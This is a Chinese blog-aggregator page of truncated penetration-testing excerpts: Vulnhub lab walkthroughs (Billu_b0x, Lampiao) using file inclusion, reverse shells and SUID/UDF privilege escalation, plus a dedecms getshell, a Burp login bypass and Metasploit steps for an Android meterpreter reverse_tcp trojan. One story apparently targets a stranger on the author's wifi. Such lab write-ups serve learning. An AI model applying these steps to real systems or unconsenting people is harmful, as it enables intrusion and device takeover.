记一次 Billu_b0x渗透】的更多相关文章

目录: 0x01 寻找ip 1.这边我们是使用的nmap来寻找我们的靶机IP地址,开始Ip是1,结束是254,153是我kali的ip,所以158就是我们的靶机的ip地址了. 2. 查看端口服务 这边使用的是-p-参数,可以看到只打开了80和22端口. 3. 查看web服务 打开我们的网页,看到有个登录框,尝试了一会也没有试出来什么注入 绕过等东西,那就继续扫目录吧. 后面看到test目录,打开提示要传参而且参数是file,大概试下文件包含,传参类型为POST.成功下载了/etc/passwd文…
vulnhub|渗透测试lampiao 题记 最近在打靶机,发现了一个挺有意思的靶机,这里想跟大家分享一下. 环境准备 vulnhub最近出的一台靶机 靶机(https://www.vulnhub.com/entry/lampiao-1,249/)Lampiao.zip (Size: 669 MB) Download: https://mega.nz/#!aG4AAaDB!CBLRRYQsAhTOyPJqyjC0Blr-weMH9QMdYbPfMj0LGeM (https://mega.nz/#…
1>查看本机IP 2>生成App木马 3>将生成的木马安装至手机 4>打开msfconsole 1,  use exploit/multi/handler  加载模块. 2, set payload android/meterpreter/reverse_tcp  选择Payload 3,show options  查看参数设置 5>更改设置 1, set LHOST 192.168.0.102   设置为我们生成木马的IP地址 2, set LPORT 4444 设置为生成…
目录: 1. 寻找IP 2.dirb目录爆破 2.PHPMailer漏洞反弹得到shell 3.python版本的exp修改 4.查看wordpress的wp-config.php配置文件得到数据库账号和密码 5.使用LinEnum.sh对linux进行信息收集 6.mysqlUDF提权,kali对EXP的编译 7.给程序chmod u+s 增加suid权限,可以以root来运行 8.利用带有suid标志的find命令进行命令执行拿到root权限 0x01 寻找IP 安装好了我们的靶机,当然我们…
前言: 起初是抓包时候查看返回状态码不一致,所以觉得是否可以通过修改状态码来达到绕过的目的,但是拦截响应包再替换手速不够,技术大哥就去搜了下,找到了一个方法,可以自动替换响应包内容. 在偏下方一点的地方有这个修改响应包的地方.Match是输入识别的内容需要使用正则表达式. replace填写被替换的内容. 这里要进行多次替换,所以这里一步一步来看 这里首先登录失败一次,在登录成功一次,看看数据包内容到底有什么不同, 下面的是登录失败内容,上面一点的是成功内容,这里看看有什么不同 这里内容从{"c…
记一次用WPScan辅助渗透WordPress站点 一.什么是WPScan? WPScan 是一个扫描 WordPress 漏洞的黑盒子扫描器,它可以为所有 Web 开发人员扫描 WordPress 漏洞并在他们开发前找到并解决问题.我们还使用了 Nikto ,它是一款非常棒的 Web 服务器评估工具,我们认为这个工具应该成为所有针对 WordPress网站进行的渗透测试的一部分. Wordpress 作为三大建站模板之一,在全世界范围内有大量的用户,这也导致白帽子都会去跟踪 WordPress…
记一次织梦cms渗透测试 0x01 前言 本次测试的整个流程:枚举用户名-针对性暴破-登录后台-后台编辑php文件getshell. 0x02 过程 1.登录功能模块存在用户名枚举缺陷,利用此权限先枚举出用户名 2.登录功能模块无验证码,通过枚举出的用户名暴力破解出相应密码.并登录后台(dedecms v57) 3.开始遇到坑了.文件式管理器上传文件和新增广告等方式都无法getshell(貌似有waf).一有动作,连接就会重置. 4.尝试直接编辑原有文件,将代码写入. (1)写入phpinfo(…
kali渗透综合靶机(八)--Billu_b0x靶机 靶机下载地址:https://download.vulnhub.com/billu/Billu_b0x.zip 一.主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24 二.端口扫描 1. masscan --rate=10000 -p0-65535 192.168.10.160 三.端口服务识别 1.nmap -sV -T4 -O 192.168.10.160 -p 22,80 四.漏洞发现与利用 1.…
/文章作者:Kali_MG1937 CSDN博客ID:ALDYS4 QQ:3496925334/ 内网漫游系列第三期:[渗透实战]记一次艰难的内网漫游第三期_我是如何利用APT攻击拿到内网最高权限的 0x01发现蹭网者 家里刚刚装了路由器,网速飞快~ 国庆期间当然是打游戏啦,可是为什么网络突然这么慢呢? 打开路由器后台列表 家里就我一个人有电脑,为什么多了一台机子? 尼玛!原来有人蹭我网,网速还占了1兆多!看来wifi密码设置得太弱了 正想踹对方下线,转念一想,既然来客人了,就得好好招待一下,不…
个人博客:点我 本次来试玩一下vulnhub上的Billu_b0x,只有一个flag,下载地址. 下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题.靶场推荐使用NAT(共享)模式,桥接模式可能会造成目标过多不易识别. IP Billu_b0x:192.168.31.190 Kali: 192.168.31.17 Win7: 192.168.31.168 信息搜集 端口扫描发现开放了80和22端口 nmap -sV -A -p- 192.168.31…